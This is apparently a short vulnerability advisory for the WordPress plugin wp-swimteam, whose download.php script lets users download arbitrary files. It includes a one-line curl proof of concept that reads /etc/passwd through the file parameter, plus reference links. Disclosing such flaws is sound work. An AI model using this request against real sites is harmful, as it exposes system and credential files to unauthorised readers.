EPSS
Percentile
95.2%
The code in ./wp-swimteam/include/user/download.php doesn’t sanitize user input from downloading sensitive system files.
$ curl “http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename;=/etc/passwd&contenttype;=text/html&transient;=1&abspath;=/usr/share/wordpress”
packetstormsecurity.com/files/132653/
vapid.dhs.org/advisory.php?v=134
wordpress.org/support/topic/security-vulnerability-6?replies=3#post-7141123